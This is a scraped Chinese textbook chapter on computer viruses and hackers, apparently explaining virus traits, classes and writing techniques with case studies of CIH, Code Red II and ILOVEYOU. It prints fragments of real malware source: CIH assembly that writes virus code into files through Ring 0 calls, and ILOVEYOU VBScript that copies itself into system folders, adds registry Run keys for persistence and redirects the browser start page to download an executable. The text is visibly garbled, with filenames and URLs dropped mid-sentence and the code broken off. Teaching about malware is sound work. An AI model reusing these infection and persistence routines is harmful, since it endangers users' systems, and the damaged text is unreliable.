第4章 計(jì)算機(jī)病毒與黑客(94)

1、第4章 計(jì)算機(jī)病毒與黑客4.1 計(jì)算機(jī)病毒的概述4.2 計(jì)算機(jī)病毒制作技術(shù)4.3 計(jì)算機(jī)殺毒軟件制作技術(shù)4.4 蠕蟲(chóng)病毒分析4.5 特洛伊木馬4.6 計(jì)算機(jī)病毒與黑客的防范 4.1 計(jì)算機(jī)病毒的概述4.1.1 計(jì)算機(jī)病毒的定義 中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例對(duì)病毒定義表明了計(jì)算機(jī)病毒就是具有破壞性的計(jì)算機(jī)程序。 計(jì)算機(jī)病毒的特征 1破壞性。 2隱蔽性。 3傳染性。熊貓燒香病毒 計(jì)算機(jī)病毒的破壞性、隱蔽性、傳染性是計(jì)算機(jī)病毒的基本特征。 4潛伏性。 5可觸發(fā)性。 6不可預(yù)見(jiàn)性。4.1.3 計(jì)算機(jī)病毒的產(chǎn)生原因 1軟件產(chǎn)品的脆弱性是產(chǎn)生計(jì)算機(jī)病毒根本的技術(shù)原因 2社會(huì)因素是產(chǎn)生計(jì)算機(jī)病毒

2、的土壤 病毒不是來(lái)源于突發(fā)或偶然的原因。一次突發(fā)的停電和偶然的錯(cuò)誤，會(huì)在計(jì)算機(jī)的磁盤和內(nèi)存中產(chǎn)生一些亂碼和隨機(jī)指令，但這些代碼是無(wú)序和混亂的，病毒則是一種比較完美的，精巧嚴(yán)謹(jǐn)?shù)拇a，按照嚴(yán)格的秩序組織起來(lái)，與所在的系統(tǒng)網(wǎng)絡(luò)環(huán)境相適應(yīng)和配合起來(lái)，病毒不會(huì)通過(guò)偶然形成，并且需要有一定的長(zhǎng)度，這個(gè)基本的長(zhǎng)度從概率上來(lái)講是不可能通過(guò)隨機(jī)代碼產(chǎn)生的?，F(xiàn)在流行的病毒是由人為故意編寫(xiě)的，多數(shù)病毒可以找到作者和產(chǎn)地信息，從大量的統(tǒng)計(jì)分析來(lái)看，病毒作者主要情況和目的是：一些天才的程序員為了表現(xiàn)自己和證明自己的能力，出于對(duì)上司的不滿，為了好奇，為了報(bào)復(fù)，為了祝賀和求愛(ài)，為了得到控制口令，為了軟件拿不到報(bào)酬預(yù)留的陷

3、阱等當(dāng)然也有因政治，軍事，宗教，民族專利等方面的需求而專門編寫(xiě)的，其中也包括一些病毒研究機(jī)構(gòu)和黑客的測(cè)試病毒 4.1.4 計(jì)算機(jī)病毒的傳播途徑 計(jì)算機(jī)病毒主要是通過(guò)復(fù)制文件、發(fā)送文件、運(yùn)行程序等操作傳播的。通常有以下幾種傳播途徑： 1移動(dòng)存儲(chǔ)設(shè)備 包括硬盤、移動(dòng)硬盤、光盤等。硬盤是數(shù)據(jù)的主要存儲(chǔ)介質(zhì)，因此也是計(jì)算機(jī)病毒感染的主要目標(biāo)。 2網(wǎng)絡(luò) 目前大多數(shù)病毒都是通過(guò)網(wǎng)絡(luò)進(jìn)行傳播的，破壞性很大。4.1.5 計(jì)算機(jī)病毒的分類 我們把計(jì)算機(jī)病毒大致歸結(jié)為7種類型。 1引導(dǎo)型病毒。主要通過(guò)感染軟盤、硬盤上的引導(dǎo)扇區(qū)或改寫(xiě)磁盤分區(qū)表（FAT）來(lái)感染系統(tǒng)。早期的計(jì)算機(jī)病毒大多數(shù)屬于這類病毒。 2文件型病毒

4、。它主要是以感染COM、EXE等可執(zhí)行文件為主，被感染的可執(zhí)行文件在執(zhí)行的同時(shí)，病毒被加載并向其它正常的可執(zhí)行文件傳染或執(zhí)行破壞操作。文件型病毒大多數(shù)也是常駐內(nèi)存的。 3宏病毒。宏病毒是一種寄存于微軟Office的文檔或模板的宏中的計(jì)算機(jī)病毒，是利用宏語(yǔ)言編寫(xiě)的。由于Office軟件在全球存在著廣泛的用戶，所以宏病毒的傳播十分迅速和廣泛。 4蠕蟲(chóng)病毒。蠕蟲(chóng)病毒與一般的計(jì)算機(jī)病毒不同，它不采用將自身拷貝附加到其它程序中的方式來(lái)復(fù)制自己，也就是說(shuō)蠕蟲(chóng)病毒不需要將其自身附著到宿主程序上。蠕蟲(chóng)病毒主要通過(guò)網(wǎng)絡(luò)傳播，具有極強(qiáng)的自我復(fù)制能力、傳播性和破壞性。 5特洛伊木馬型病毒。特洛伊木馬型病毒實(shí)際上就是

5、黑客程序，一般不對(duì)計(jì)算機(jī)系統(tǒng)進(jìn)行直接破壞，而是通過(guò)網(wǎng)絡(luò)控制其它計(jì)算機(jī)，包括竊取秘密信息，占用計(jì)算機(jī)系統(tǒng)資源等現(xiàn)象。 6網(wǎng)頁(yè)病毒。網(wǎng)頁(yè)病毒一般也是使用腳本語(yǔ)言將有害代碼直接寫(xiě)在網(wǎng)頁(yè)上，當(dāng)瀏覽網(wǎng)頁(yè)時(shí)會(huì)立即破壞本地計(jì)算機(jī)系統(tǒng)，輕者修改或鎖定主頁(yè)，重者格式化硬盤，使你防不勝防。 7混合型病毒。兼有上述計(jì)算機(jī)病毒特點(diǎn)的病毒統(tǒng)稱為混合型病毒，所以它的破壞性更大，傳染的機(jī)會(huì)也更多，殺毒也更加困難。 有多種分類方法：根據(jù)病毒存在的媒體可分為網(wǎng)絡(luò)病毒，文件病毒，引導(dǎo)型病毒。 根據(jù)病毒傳染的方法可分為駐留型病毒和非駐留型病毒。按病毒破壞的能力可分為無(wú)害型、無(wú)危險(xiǎn)型、危險(xiǎn)型、非常危險(xiǎn)型。按病毒的算法可分為伴隨型病毒

6、，“蠕蟲(chóng)”型病毒，寄生型病毒、詭秘型病毒（它們一般不直接修改DOS中斷和扇區(qū)數(shù)據(jù)，而是通過(guò)設(shè)備技術(shù)和文件緩沖區(qū)等DOS內(nèi)部修改，不易看到資源，使用比較高級(jí)的技術(shù)。利用DOS空閑的數(shù)據(jù)區(qū)進(jìn)行工作。）、變型病毒（又稱幽靈病毒） （這一類病毒使用一個(gè)復(fù)雜的算法，使自己每傳播一份都具有不同的內(nèi)容和長(zhǎng)度。它們一般的作法是一段混有無(wú)關(guān)指令的解碼算法和被變化過(guò)的病毒體組成）。 4.1.6 計(jì)算機(jī)病毒的表現(xiàn)現(xiàn)象 1.計(jì)算機(jī)系統(tǒng)運(yùn)行速度減慢。 2.計(jì)算機(jī)系統(tǒng)經(jīng)常無(wú)故發(fā)生死機(jī)。 3.計(jì)算機(jī)系統(tǒng)中的文件長(zhǎng)度發(fā)生變化。 4.計(jì)算機(jī)存儲(chǔ)的容量異常減少。 5.系統(tǒng)引導(dǎo)速度減慢。 6.丟失文件或文件損壞。 7.計(jì)算機(jī)屏幕上

7、出現(xiàn)異常顯示。 8.計(jì)算機(jī)系統(tǒng)的蜂鳴器出現(xiàn)異常聲響。 9.磁盤卷標(biāo)發(fā)生變化。 10.系統(tǒng)不識(shí)別硬盤。 11.對(duì)存儲(chǔ)系統(tǒng)異常訪問(wèn)。 12.鍵盤輸入異常。 13.文件的日期、時(shí)間、屬性等發(fā)生變化。 14.文件無(wú)法正確讀取、復(fù)制或打開(kāi)。 15.命令執(zhí)行出現(xiàn)錯(cuò)誤。 16.虛假報(bào)警。 17.換當(dāng)前盤。有些病毒會(huì)將當(dāng)前盤切換到C盤。 18.時(shí)鐘倒轉(zhuǎn)。有些病毒會(huì)命名系統(tǒng)時(shí)間倒轉(zhuǎn)，逆向計(jì)時(shí)。 操作系統(tǒng)無(wú)故頻繁出現(xiàn)錯(cuò)誤?；驘o(wú)法正常啟動(dòng)。20.系統(tǒng)異常重新啟動(dòng)。 21.一些外部設(shè)備工作異常。如打印和通訊發(fā)生異常。 22.異常要求用戶輸入密碼。 或EXCEL提示執(zhí)行“宏”。 24.不應(yīng)駐留內(nèi)存的程序駐留內(nèi)存。 25

8、平時(shí)運(yùn)行正常的計(jì)算機(jī)突然經(jīng)常性無(wú)緣無(wú)故地死機(jī)。 26收到陌生人發(fā)來(lái)的電子郵件。 27自動(dòng)鏈接到一些陌生的網(wǎng)站。 28網(wǎng)絡(luò)癱瘓。 4.1.7 計(jì)算機(jī)病毒程序一般構(gòu)成 病毒程序一般由三個(gè)基本模塊組成，即安裝模塊、傳染模塊和破壞模塊。 1安裝模塊 病毒程序必須通過(guò)自身的程序?qū)崿F(xiàn)自啟動(dòng)并安裝到計(jì)算機(jī)系統(tǒng)中，不同類型的病毒程序會(huì)使用不同的安裝方法。 2傳染模塊 傳染模塊包括三部分內(nèi)容： （1）傳染控制部分。病毒一般都有一個(gè)控制條件，一旦滿足這個(gè)條件就開(kāi)始感染。例如，病毒先判斷某個(gè)文件是否是.EXE文件，如果是再進(jìn)行傳染，否則再尋找下一個(gè)文件； （2）傳染判斷部分。每個(gè)病毒程序都有一個(gè)標(biāo)記，在傳染時(shí)將判斷

9、這個(gè)標(biāo)記，如果磁盤或者文件已經(jīng)被傳染就不再傳染，否則就要傳染了； （3）傳染操作部分。在滿足傳染條件時(shí)進(jìn)行傳染操作。 3破壞模塊 計(jì)算機(jī)病毒的最終目的是進(jìn)行破壞，其破壞的基本手段就是刪除文件或數(shù)據(jù)。破壞模塊包括兩部分：一是激發(fā)控制，另一個(gè)就是破壞操作。 對(duì)每個(gè)病毒程序來(lái)說(shuō)，安裝模塊、傳染模塊是必不可少的，而破壞模塊可以直接隱含在傳染模塊中，也可以單獨(dú)構(gòu)成一個(gè)模塊。 計(jì)算機(jī)病毒程序工作的一般流程用類C語(yǔ)言描述如下：/*引導(dǎo)功能模塊*/將病毒程序寄生于宿主程序中；加載計(jì)算機(jī)程序；病毒程序隨其宿主程序的運(yùn)行進(jìn)入系統(tǒng)；傳染功能模塊；破壞功能模塊；main()調(diào)用引導(dǎo)功能模塊；A：do 尋找傳染對(duì)象；

10、if(傳染條件不滿足)goto A； while(滿足傳染條件)； 調(diào)用傳染功能模塊；while(滿足破壞條件) 激活病毒程序；調(diào)用破壞功能模塊； 運(yùn)行宿主源程序； if 不關(guān)機(jī) goto A； 關(guān)機(jī)；計(jì)算機(jī)病毒程序工作的N-S圖如右圖 4.2 計(jì)算機(jī)病毒制作技術(shù) 1采用自加密技術(shù) 計(jì)算機(jī)病毒采用自加密技術(shù)就是為了防止被計(jì)算機(jī)病毒檢測(cè)程序掃描出來(lái)，并被輕易地反匯編。這對(duì)分析和破譯計(jì)算機(jī)病毒等工作都增加了很多困難。 2采用變形技術(shù) 計(jì)算機(jī)病毒編制者通過(guò)修改某種已知計(jì)算機(jī)病毒的代碼，使其能夠躲過(guò)現(xiàn)有計(jì)算機(jī)病毒檢測(cè)程序時(shí)，稱這種新出現(xiàn)的計(jì)算機(jī)病毒是原來(lái)被修改計(jì)算機(jī)病毒的變形或變種。 3采用特殊的隱形

11、技術(shù) 當(dāng)計(jì)算機(jī)病毒采用特殊的隱形技術(shù)后，可以在計(jì)算機(jī)病毒進(jìn)入內(nèi)存后，使計(jì)算機(jī)用戶幾乎感覺(jué)不到它的存在。采用這種“隱形”技術(shù)的計(jì)算機(jī)病毒化裝成了正常表現(xiàn)形式。 4對(duì)抗計(jì)算機(jī)病毒防范系統(tǒng) 當(dāng)有某些著名的計(jì)算機(jī)病毒殺毒軟件或在文件中查找到出版這些軟件的公司名時(shí)，就會(huì)刪除這些殺毒軟件或文件等。 5反跟蹤技術(shù) 計(jì)算機(jī)病毒采用反跟蹤措施的目的是要提高計(jì)算機(jī)病毒程序的防破譯能力和偽裝能力。常規(guī)程序使用的反跟蹤技術(shù)在計(jì)算機(jī)病毒程序中都可以利用。 6利用中斷處理機(jī)制 病毒設(shè)計(jì)者篡改中斷處理功能為達(dá)到傳染、激發(fā)和破壞等目的。如INT 13H是磁盤輸入輸出中斷，引導(dǎo)型病毒就是用它來(lái)傳染病毒和格式化磁盤的。 7 Wi

12、ndows病毒編制的關(guān)鍵技術(shù)(1) 利用文件技術(shù) 文件屬于Windows啟動(dòng)配置文件，主要用于對(duì)一些在Windows運(yùn)行過(guò)程中無(wú)法進(jìn)行刪除、更名或更新等操作的文件在啟動(dòng)過(guò)程中進(jìn)行上述操作，它存在的時(shí)間很短，操作完成后即被自動(dòng)刪除。文件有3個(gè)可能的段，其中“rename”段的格式為：renamefilename1=filename2行“filename1=filename2”相當(dāng)于依次執(zhí)行“copy filename2 filename1”及“del filename2”這兩個(gè)DOS命令。 啟動(dòng)時(shí)，Windows將用filename2覆蓋filename1，再刪除filename2，這就實(shí)現(xiàn)了用

13、filename2更新filename1的目的，如果filename1不存在，實(shí)際結(jié)果是將filename2改名為filename1；如果要?jiǎng)h除文件，可令filename1為nul。 在Windows中，一個(gè)可執(zhí)行文件如果正在運(yùn)行或某個(gè)庫(kù)文件（*.dll、*.vxd、*.sys等）正在被打開(kāi)使用，則不能被改寫(xiě)或刪除。例如，在資源管理器中無(wú)法刪除，或者在Windows的GDI界面下，刪除顯示驅(qū)動(dòng)程序庫(kù)文件、文件子系統(tǒng)庫(kù)文件等。若要對(duì)這些文件進(jìn)行升級(jí)，改動(dòng)，就必須在Windows保護(hù)模式核心啟動(dòng)前進(jìn)行，即利用基于文件的一個(gè)機(jī)制來(lái)完成這個(gè)任務(wù)。 這個(gè)機(jī)制是：將刪除或改寫(xiě)這類文件的應(yīng)用程序按一定的格式

14、把命令寫(xiě)入 ，Windows在重啟時(shí)，將在Windows目錄下搜索文件，如果找到，就遵照該文件指令刪除、改名、更新文件，完成任務(wù)后，將刪除文件本身，繼續(xù)啟動(dòng)過(guò)程。所以文件中的指令只會(huì)被執(zhí)行一次，列目錄時(shí)也通常沒(méi)有它的蹤影。 Windows病毒在感染文件時(shí)，也碰到了這樣一個(gè)問(wèn)題，某些文件，因?yàn)橄到y(tǒng)正在使用，不能被改寫(xiě)和感染，早期的Windows病毒如CIH病毒采用VxD技術(shù)來(lái)解決這個(gè)問(wèn)題，這易造成系統(tǒng)不穩(wěn)定，后期的病毒大多采用Windows提供的標(biāo)準(zhǔn)方法文件來(lái)解決這個(gè)問(wèn)題。 如下幾種新出現(xiàn)的Windows病毒即使用了這種方法。1） “Win32.Kriz”病毒又叫“圣誕節(jié)”病毒，內(nèi)存駐留型，具有

15、多形性且極端危險(xiǎn)，在12月25日發(fā)作時(shí)將改寫(xiě)CMOS，覆蓋所有驅(qū)動(dòng)器上的所有文件，然后用CIH病毒中的同樣程序破壞主板上Flash BIOS，該病毒感染exe（PE格式，即Portable Executable File Format，可移植的執(zhí)行體）和scr文件，同時(shí)為了監(jiān)控所有文件操作，它感染，接管文件復(fù)制、打開(kāi)、移動(dòng)等文件存取函數(shù)，由于文件在Windows運(yùn)行時(shí)只能以只讀方式打開(kāi)，為感染它，該病毒將它復(fù)制一份，名為，然后感染復(fù)制品，寫(xiě)Rename指令到文件中，下次機(jī)器啟動(dòng)時(shí)，將替代原來(lái)的完成感染。2） 蠕蟲(chóng)“Supp1.A”是一個(gè)Word宏蠕蟲(chóng)，通過(guò)在發(fā)出的E-mail中插入一個(gè)特洛伊文

16、檔作為附件傳播。當(dāng)被打開(kāi)時(shí)病毒復(fù)制文檔到，把要展開(kāi)的數(shù)據(jù)寫(xiě)到文件，并解壓為，以上文件都放在Windows目錄下。接下來(lái)這個(gè)蠕蟲(chóng)創(chuàng)建一個(gè)具有如下內(nèi)容的文件。renamenul=該病毒將把硬盤上doc、xls、txt、rif、zip、arj、rar等類型文件長(zhǎng)度置03） Heathen病毒“Heathen病毒”是一個(gè)多平臺(tái)病毒，感染W(wǎng)ord文檔和PE格式的exe文件。為了感染，病毒先把復(fù)制為，然后加一條“rename”指令到文件，例如：rename=下次啟動(dòng)時(shí)，Windows將幫助它完成對(duì)的感染。另外，該病毒發(fā)作時(shí)也使來(lái)刪除Windows注冊(cè)表文件:renamenul=nul=4） “Win95.

17、SK”是最兇狠、最狡猾的病毒之一，原有一些BUG，現(xiàn)在已出現(xiàn)了更新版本，糾正了第一個(gè)版本中的所有BUG。它是一個(gè)寄生性的Windows病毒，可感染W(wǎng)indows PE格式文件、HLPE幫助文件、壓縮包文件（rar、xip、arj、ha）。它采用了許多新的高級(jí)技術(shù)，如：自身加密解密技術(shù)，入口點(diǎn)隱藏技術(shù)等，當(dāng)磁盤上文件被訪問(wèn)時(shí)，它檢查其文件名，如果是幾個(gè)反病毒程序的名字（DINF、AVPI、AVP、VBA、DRWEB），該病毒將刪除從C：盤到Z：盤的所有目錄下的所有能被刪除的文件，然后，調(diào)用函數(shù)Fatal_Error_Handler使系統(tǒng)死機(jī)。 Windows Shell文件是Windows病毒必

18、爭(zhēng)之地，該病毒自然不會(huì)放過(guò)，但比其他病毒更加完善，它通過(guò)從文件中的“Shell=”行來(lái)獲得Shell文件名，這樣，即使將改名，在Shell中指定實(shí)際的文件名，期望借此避免被感染，也是徒勞，它感染Shell文件的具體步驟是：以為例，把復(fù)制為，然后感染、再創(chuàng)建文件，寫(xiě)入合適的rename指令，這與其他病毒的作法相同。(2) 利用注冊(cè)表技術(shù) 注冊(cè)表是一個(gè)龐大的數(shù)據(jù)庫(kù)，用來(lái)存儲(chǔ)計(jì)算機(jī)軟硬件的各種配置數(shù)據(jù)。注冊(cè)表中記錄了用戶安裝在計(jì)算機(jī)上的軟件和每個(gè)程序的相關(guān)信息，用戶可以通過(guò)注冊(cè)表調(diào)整軟件的運(yùn)行性能、檢測(cè)和恢復(fù)系統(tǒng)錯(cuò)誤、定制桌面等。因而掌握了注冊(cè)表，即掌握了對(duì)計(jì)算機(jī)配置的控制權(quán)。因此，病毒程序可以通過(guò)

19、修改、掌握注冊(cè)表，來(lái)達(dá)到控制計(jì)算機(jī)的目的。 這類方法常用的有修改注冊(cè)表的鍵值、鎖定注冊(cè)表等。(3) 虛擬設(shè)備驅(qū)動(dòng)程序（VxD） VxD是一個(gè)管理如硬件設(shè)備或者已安裝軟件等系統(tǒng)資源的32位可執(zhí)行程序，使得幾個(gè)應(yīng)用程序可以同時(shí)使用這些資源。Windows通過(guò)使用VxD允許基于Windows的應(yīng)用程序?qū)崿F(xiàn)多任務(wù)。VxD在與Windows的連接工作中處理中斷，并為需要進(jìn)行I/O操作的應(yīng)用程序執(zhí)行I/O操作，而且不影響其他應(yīng)用程序的執(zhí)行。大多數(shù)VxD管理硬件設(shè)備，也有一些VxD管理或代替與之相關(guān)的軟件，例如普通ROM BIOS。 其實(shí)，VxD不僅僅可以用來(lái)控制硬件設(shè)備，因?yàn)閂xD工作在80386保護(hù)模式

20、Ring 0特權(quán)級(jí)（最高特權(quán)級(jí)）上，而一般的應(yīng)用程序工作在Ring 3特權(quán)級(jí)（最低特權(quán)級(jí)）上，所以VxD可以完成許多API不能完成的功能，例如端口讀寫(xiě)、物理內(nèi)存讀寫(xiě)、中斷調(diào)用、API攔截等。因此，在Windows系統(tǒng)的病毒編制技術(shù)中，通過(guò)編制一個(gè)VxD病毒程序或編制一小段病毒程序代碼來(lái)來(lái)激活一個(gè)動(dòng)態(tài)VxD，使得系統(tǒng)癱瘓，也是常見(jiàn)方法之一。由于Windows系統(tǒng)對(duì)VxD的行為沒(méi)有限制，因此VxD病毒可以繞過(guò)所采用的任何保機(jī)制，所以此種病毒相當(dāng)惡毒。 此類典型病毒即為CIH病毒。該病毒使用面向Windows的VxD技術(shù)編制，主要感染W(wǎng)indows操作系統(tǒng)下的可執(zhí)行文件（exe、com、vxd、vx

21、e），并且在DOS、及Windows NT中無(wú)效，感染后的文件大小根本沒(méi)有變化，病毒代碼的大小在1KB左右。由于CIH病毒獨(dú)特地使用了VxD技術(shù)，使得這種病毒在Windows環(huán)境下傳播，使用一般反病毒軟件很難發(fā)現(xiàn)這種病毒在系統(tǒng)中的傳播。CIH病毒程序部分代碼如下：lea eax, (LastVxDCallAddress-2-9)esi;上一個(gè)調(diào)用VxD的指令的地址 mov cl, VxDCallTableSize ;所用VxD調(diào)用的個(gè)數(shù) LoopOfRestoreVxDCallID: mov word ptr eax, 20cdh;還原成int 20h的形式 mov edx, (VxDCall

22、IDTable+(ecx-1)*04h-9)esi ;從VxDCallIDTable取出VxD調(diào)用的id號(hào)放到edxmov eax+2, edx;放到int 20h的后面,形成int 20h and the Service Identifier的形式 movzx edx, byte ptr (VxDCallAddressTable+ecx19)esi ;VxDCallAddressTable中放著各個(gè)調(diào)用VxD的指令的地址之差 sub eax, edx;eax為上一個(gè)調(diào)用地址 loop LoopOfRestoreVxDCallID ;還原其他的調(diào)用WriteVirusCodeToFile: m

23、ov eax, dr1;dr1為前面所保存的esp mov ebx, eax+10h;ebx為保存在棧中的保存文件句柄 mov edi, eax;edi為保存在棧中的IFSMgr_Ring0_FileIO調(diào)用的地址 LoopOfWriteVirusCodeToFile: pop ecx;病毒代碼各段的偏移 jecxz SetFileModificationMark;到病毒偏移零為止 mov esi, ecx mov eax, 0d601h;寫(xiě)文件功能號(hào)(R0_WRITEFILE) pop edx;文件指針 pop ecx;要寫(xiě)的字節(jié)數(shù) call edi;VxDCall IFSMgr_Ring0

24、_FileIO;寫(xiě)文件,依次寫(xiě)入:各段病毒代碼,病毒塊表,新的文件塊表,新的程序入口,感染標(biāo)志 jmp LoopOfWriteVirusCodeToFile在CIH病毒代碼中，全部系統(tǒng)調(diào)用都是采用VxD調(diào)用，這種方法編制的病毒代碼與其他方法編制的病毒代碼比較而言，病毒代碼更加底層，效率更高。特別是和用API函數(shù)編制的病毒相比不需考慮病毒自身的復(fù)雜重定位過(guò)程，和使用中斷編制的病毒相比更能防止對(duì)程序的跟蹤分析。CIH病毒分為駐留、感染、發(fā)作3個(gè)主要模塊。病毒感染時(shí)查找感染對(duì)象文件的各塊之間的空白區(qū)域，把病毒自己的各種數(shù)據(jù)結(jié)構(gòu)和代碼寫(xiě)到其中。病毒的有關(guān)操作需要0級(jí)的權(quán)限，所以病毒一開(kāi)始就設(shè)法獲得0級(jí)

25、權(quán)限，監(jiān)測(cè)駐留情況，用VxD調(diào)用分配內(nèi)存，并完成駐留。隨后病毒安裝文件系統(tǒng)鉤子程序(指向感染模塊)，并保存原來(lái)的鉤子指針，鉤子程序?qū)⒃谒械奈募僮髦斜患せ?，它判斷是否在打開(kāi)文件，如是就打開(kāi)并傳染之。病毒發(fā)作時(shí)，該模塊會(huì)覆蓋硬盤中的絕大多數(shù)數(shù)據(jù)和Flash BIOS中的數(shù)據(jù)。只要計(jì)算機(jī)的微處理器是Pentium Intel 430TX，一旦Flash BIOS被覆蓋掉，那么機(jī)器將不能啟動(dòng)，只有將Flash BIOS進(jìn)行重寫(xiě)之后才行。(4) 其他編制技術(shù) 在Windows病毒編制技術(shù)中，除了上述幾種典型技術(shù)外，還有另外一些方法也較常用，例如，有的病毒程序?qū)Τ绦蝈e(cuò)誤進(jìn)行屏蔽，使得錯(cuò)誤程序繼續(xù)執(zhí)行，

26、從而引起系統(tǒng)損壞。還有的病毒程序是對(duì)系統(tǒng)進(jìn)程進(jìn)行控制，通過(guò)注冊(cè)遠(yuǎn)程線程的方法，使得系統(tǒng)進(jìn)程無(wú)限循環(huán)，進(jìn)程堆積，機(jī)器效率逐漸變低，最后使得系統(tǒng)癱瘓。對(duì)于郵件型病毒，可以通過(guò)提取Windows地址簿文件（*.wab）的E-mail信息，不斷發(fā)送郵件，造成系統(tǒng)災(zāi)難。(1) “紅色代碼”病毒“紅色代碼”是一種專門攻擊以及Windows 2000系統(tǒng)的惡性網(wǎng)絡(luò)蠕蟲(chóng)VirtualRoot（虛擬目錄）病毒。該病毒利用微軟Index Server(ida/idq)ISAPI擴(kuò)展遠(yuǎn)程溢出漏洞，通過(guò)80端口發(fā)送一個(gè)構(gòu)造后的HTTP GET請(qǐng)求到服務(wù)器，當(dāng)本地IIS服務(wù)程序收到某個(gè)來(lái)自CodeRedII發(fā)的請(qǐng)求數(shù)據(jù)

27、包時(shí)，由于存在漏洞，導(dǎo)致處理函數(shù)的堆棧溢出（Overflow）。當(dāng)函數(shù)返回時(shí)，原返回地址已被病毒數(shù)據(jù)包覆蓋，系統(tǒng)強(qiáng)迫運(yùn)行病毒代碼，此時(shí)病毒被激活，并運(yùn)行在IIS服務(wù)程序的堆棧中。8.典型Windows病毒分析 這種蠕蟲(chóng)病毒修改Windows注冊(cè)表并放置特洛伊木馬程序（將改名為），并將文件復(fù)制到別的目錄，這些目錄包括，; ; c:program filescommon filessystem; d:program filescommon filessystem. 顯然原來(lái)的的文件被從Windows NT的System目錄復(fù)制到了別的目錄，給黑客的入侵敞開(kāi)了大門。不僅如此，該網(wǎng)絡(luò)蠕蟲(chóng)程序還會(huì)修改系

28、統(tǒng)的注冊(cè)表項(xiàng)目：HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETSERVICESW3 SVCPARAMETERSVIRTUALROOTS 通過(guò)該項(xiàng)目的修改，該蠕蟲(chóng)程序可以建立虛擬的目錄C或者D，病毒名由此而來(lái)。受感染的機(jī)器可由黑客們通過(guò)HTTP GET的請(qǐng)求運(yùn)行scripts/來(lái)獲得對(duì)受感染機(jī)器的完全的控制權(quán)。該網(wǎng)絡(luò)蠕蟲(chóng)的主線程檢查2個(gè)不同的標(biāo)記：第一個(gè)標(biāo)記是29A（29A是國(guó)外最著名的病毒編寫(xiě)組織的代號(hào)），該標(biāo)記控制該網(wǎng)絡(luò)蠕蟲(chóng)程序的安裝；第二個(gè)標(biāo)記是檢查是否有“CodeRed II”，如果存在的話，該網(wǎng)絡(luò)蠕蟲(chóng)程序進(jìn)入無(wú)限的休眠狀態(tài)。 病毒激活時(shí)，網(wǎng)絡(luò)蠕蟲(chóng)程序

29、會(huì)檢查當(dāng)前的系統(tǒng)的語(yǔ)言，如果默認(rèn)的語(yǔ)言是漢字系統(tǒng)，不管是簡(jiǎn)體的還是繁體的漢字系統(tǒng)，它會(huì)建立600個(gè)新的線程；如果不是這兩種系統(tǒng)語(yǔ)言的話，該網(wǎng)絡(luò)蠕蟲(chóng)程序建立300個(gè)線程。每一個(gè)線程產(chǎn)生一組隨機(jī)的IP地址，并尋找其中可以感染的目標(biāo)機(jī)器。這些線程不斷感染別的機(jī)器，當(dāng)感染一臺(tái)服務(wù)器成功了以后，如果受感染的機(jī)器是中文系統(tǒng)，該程序會(huì)休眠2天，別的機(jī)器休眠1天。當(dāng)休眠的時(shí)間到了以后，該蠕蟲(chóng)程序會(huì)使得機(jī)器重新啟動(dòng)。同時(shí)該蠕蟲(chóng)也會(huì)檢查機(jī)器的月份是否是10月或者年份是否是2002年，如果是的話，受感染的服務(wù)器也會(huì)重新啟動(dòng)。 當(dāng)Windows NT系統(tǒng)啟動(dòng)時(shí)，NT系統(tǒng)會(huì)自動(dòng)搜索C盤根目錄下的文件。受該網(wǎng)絡(luò)蠕蟲(chóng)程序感

30、染的服務(wù)器上的文件，也就是該網(wǎng)絡(luò)蠕蟲(chóng)程序本身。該文件的大小是8192B，該網(wǎng)絡(luò)蠕蟲(chóng)程序就是通過(guò)該程序來(lái)執(zhí)行的。 它同時(shí)還會(huì)修改系統(tǒng)的注冊(cè)表項(xiàng)目： HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWS NTCURRENTVERSION WINLOGON 將其中的數(shù)值SFCDisable設(shè)置成 0 xFFFFFF9D ,使得系統(tǒng)啟動(dòng)時(shí)不檢查系統(tǒng)文件的完整性。(2) “I LOVE YOU”病毒 “I LOVE YOU”病毒是用vbscript寫(xiě)出來(lái)的通過(guò)E-mail散布的病毒。打開(kāi)郵件的附件時(shí)，含有病毒的腳本程序運(yùn)行，該病毒首先將自身復(fù)制到下列目錄中：$windir

31、/Win32DLL.vbs ($windir = c:windows on most windows systems)$systemdir/MSKernel32.vbs ($systemdir = c:windowssystem)然后將這些文件加載到注冊(cè)表中以便在啟動(dòng)時(shí)自動(dòng)運(yùn)行。并且改變默認(rèn)的IE瀏覽頁(yè)面，通過(guò)該頁(yè)面可下載一個(gè)可執(zhí)行的代碼，下載完畢后再將其加入注冊(cè)表，并把IE的默認(rèn)瀏覽頁(yè)面再改為about:blank。接下來(lái)該病毒掃描硬盤及網(wǎng)絡(luò)共享硬盤，尋找后綴為vbs、vbe、js、jse、css、wsh、sct、hta、vbs、jpg、jpeg 的文件，并將所有這些文件改變成這個(gè)病毒，當(dāng)發(fā)

32、現(xiàn)有mp2或者mp3格式的文件時(shí)，將自身復(fù)制到同樣目錄下的一個(gè)vbs script中，若找到mIRC時(shí)則建立一個(gè)小的mIRC script（可以發(fā)送html頁(yè)面），這樣就可以對(duì)所有加入所在頻道的所有用戶發(fā)送html并感染對(duì)方的IE。當(dāng)感染了病毒的IE運(yùn)行時(shí)，會(huì)將其共享密碼及IP地址通過(guò)E-mail發(fā)送回指定的地址。該病毒修改注冊(cè)表部分源代碼如下：Set fso = ) Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2)

33、 Set c = ) c.Copy(dirsystem&MSKernel32.vbs) c.Copy(dirwin&Win32DLL.vbs) ) Dim num,downread regcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32, dirsystem&MSKernel32.vbs regcreate HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices Win32DLL,dirwin&Win32DLL.

34、vbs downread= downread=regget(HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory) if (downread=) then downread=c: end if if (fileexist(dirsystem&WinFAT32.exe)=1) then Randomize num = Int(4 * Rnd) + 1) if num = 1 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,

35、elseif num = 2 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ num = 3 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ num = 4 then regcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Page, :/ end if end if if (fileexist(downread&WINBUGSFIX.exe)=

